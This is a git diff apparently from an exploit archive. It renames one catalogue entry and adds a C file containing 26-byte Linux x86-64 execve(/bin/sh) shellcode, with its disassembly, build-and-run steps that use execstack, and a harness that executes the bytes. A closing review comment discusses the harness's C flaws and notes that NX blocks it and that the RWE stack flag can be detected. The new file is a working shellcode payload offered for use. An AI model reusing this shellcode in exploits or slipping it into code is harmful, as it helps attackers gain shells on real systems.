diff --git a/files.csv b/files.csv
index 2a5376c93..7b0cef0c5 100755
--- a/files.csv
+++ b/files.csv
@@ -16263,7 +16263,7 @@ id,file,description,date,author,platform,type,port
 18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0
 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0
 18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin <= 2.4.0 - Multiple XSS Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0
-18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0
+18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Auth Remote Code Injection",2012-04-29,metasploit,linux,webapps,0
 18798,platforms/php/webapps/18798.txt,"Soco CMS Local File Include Vulnerability",2012-04-29,"BHG Security Center",php,webapps,0
 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0
 18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple CSRF Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0
@@ -35846,3 +35846,4 @@ id,file,description,date,author,platform,type,port
 39614,platforms/osx/dos/39614.c,"OS X Kernel - AppleKeyStore Use-After-Free",2016-03-23,"Google Security Research",osx,dos,0
 39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0
 39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0
+39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86_x64 - execve(/bin/sh) - 26 bytes",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0
diff --git a/platforms/lin_x86-64/shellcode/39617.c b/platforms/lin_x86-64/shellcode/39617.c
new file mode 100755
index 000000000..ef439d52d
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/39617.c
@@ -0,0 +1,48 @@
+/*
+---------------------------------------------------------------------------------------------------
+
+Linux/x86_x64 - execve(/bin/sh) - 26 bytes
+
+Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
+
+Om Asato Maa Sad-Gamaya |
+Tamaso Maa Jyotir-Gamaya |
+Mrtyor-Maa Amrtam Gamaya |
+Om Shaantih Shaantih Shaantih |
+
+---------------------------------------------------------------------------------------------------
+Disassembly of section .text:
+
+0000000000400080 <.text>:
+ 400080: eb 0b jmp 0x40008d
+ 400082: 5f pop %rdi
+ 400083: 48 31 d2 xor %rdx,%rdx
+ 400086: 48 89 d6 mov %rdx,%rsi
+ 400089: b0 3b mov $0x3b,%al
+ 40008b: 0f 05 syscall
+ 40008d: e8 f0 ff ff ff callq 0x400082
+ 400092: 2f (bad)
+ 400093: 2f (bad)
+ 400094: 62 (bad)
+ 400095: 69 .byte 0x69
+ 400096: 6e outsb %ds:(%rsi),(%dx)
+ 400097: 2f (bad)
+ 400098: 73 68 jae 0x400102
+---------------------------------------------------------------------------------------------------
+
+How To Run
+
+$ gcc -o sh_shell sh_shell.c
+$ execstack -s sh_shell
+$ ./sh_shell
+
+---------------------------------------------------------------------------------------------------
+*/
+#include
+char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x48\x89\xd6\xb0\x3b\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68";
+void main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int (*)()) sh;
+ (int)(*func)();
+}
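Review bot: The C harness at the end of the new file is not valid ISO C as shown: the `#include` line names no header (possibly lost in rendering, so check the original), `void main(int argc, char **argv)` should be `int main(void)` since neither argument is used, and the `(int)` cast on the discarded call result does nothing. The conversion `(int (*)()) sh` from a data array to a function pointer is not defined by the C standard, and the call only proceeds when the page holding `sh` is executable, which is why the header comment needs `execstack -s`; on a default build with NX enforced the program faults instead. I would state that in the header comment, e.g. `Requires an executable data mapping; with NX/W^X enforced this harness segfaults`, and mention that the resulting binary carries a `GNU_STACK` segment flagged RWE, which `readelf -lW` shows and which build or endpoint checks can flag. The "How To Run" steps also refer to `sh_shell.c` while the file is added as `39617.c`.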